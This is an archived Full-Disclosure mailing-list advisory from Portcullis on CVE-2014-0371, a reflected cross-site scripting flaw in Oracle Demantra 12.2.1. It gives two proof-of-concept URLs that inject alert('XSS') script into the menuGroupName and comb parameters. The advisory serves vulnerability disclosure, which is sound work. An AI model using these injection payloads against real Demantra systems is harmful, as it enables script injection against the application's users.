'[Full-disclosure] CVE-2014-0371 - Reflective XSS in Oracle Demantra'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] CVE-2014-0371 - Reflective XSS in Oracle Demantra
From:       Portcullis Advisories <advisories () portcullis-security ! com>
Date:       2014-02-28 15:37:18
Message-ID: 5310AD2E.9050807 () portcullis-security ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Vulnerability title: Reflective XSS in Oracle Demantra
CVE: CVE-2014-0371
Vendor: Oracle
Product: Demantra
Affected version: 12.2.1
Fixed version: 12.2.3
Reported by: Oliver Gruskovnjak

Details:

Reflective Cross-Site Scripting issues found in Oracle Demantra:

http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications</title><script>alert('XSS')</script>&tkn=-308184887676887


http://www.target.com:8080/demantra/portal/htmlQuery.jsp?queryId=12510&view=0&levelId=null&memberId=null&comb=15525';}alert('XSS');function+aaa(){//271&tkn=427890217092227
  

Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0371/



Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


[Attachment #5 (text/html)]

<html>
  <head>
    <meta content="text/html; charset=ISO-8859-1"
      http-equiv="Content-Type">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    Vulnerability title: Reflective XSS in Oracle Demantra<br>
    CVE: CVE-2014-0371<br>
    Vendor: Oracle<br>
    Product: Demantra<br>
    Affected version: 12.2.1<br>
    Fixed version: 12.2.3<br>
    Reported by: Oliver Gruskovnjak<br>
    <br>
    Details:<br>
    <br>
    Reflective Cross-Site Scripting issues found in Oracle Demantra:
    <meta http-equiv="content-type" content="text/html;
      charset=ISO-8859-1">
    <br>
    <br>
<a class="moz-txt-link-freetext" \
href="http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&amp;menuGrou \
pId=5&amp;menuGroupName=Applications">http://www.target.com:8080/demantra/portal/editExecDefinit \
ion.jsp?menuBarId=2&amp;menuGroupId=5&amp;menuGroupName=Applications</a>&lt;/title&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&amp;tkn=-308184887676887<br>
  <br>
<a class="moz-txt-link-freetext" \
href="http://www.target.com:8080/demantra/portal/htmlQuery.jsp?queryId=12510&amp;view=0&amp;leve \
lId=null&amp;memberId=null&amp;comb=15525">http://www.target.com:8080/demantra/portal/htmlQuery. \
jsp?queryId=12510&amp;view=0&amp;levelId=null&amp;memberId=null&amp;comb=15525</a>';}alert('XSS');function+aaa(){//271&amp;tkn=427890217092227<br>
  &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; <br>
    <br>
    Further details at:
    <meta http-equiv="content-type" content="text/html;
      charset=ISO-8859-1">
    <a
href="https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cv \
e-2014-0371/">https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0371/</a><br>
  <br>
    <br>
    Copyright:<br>
    Copyright (c) Portcullis Computer Security Limited 2014, All rights
    reserved worldwide. Permission is hereby granted for the electronic
    redistribution of this information. It is not to be edited or
    altered in any way without the express written consent of Portcullis
    Computer Security Limited.<br>
    <br>
    Disclaimer:<br>
    The information herein contained may change without notice. Use of
    this information constitutes acceptance for use in an AS IS
    condition. There are NO warranties, implied or otherwise, with
    regard to this information or its use. Any use of this information
    is at the user's risk. In no event shall the author/distributor
    (Portcullis Computer Security Limited) be held liable for any
    damages whatsoever arising out of or in connection with the use or
    spread of this information.<br>
  </body>
</html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic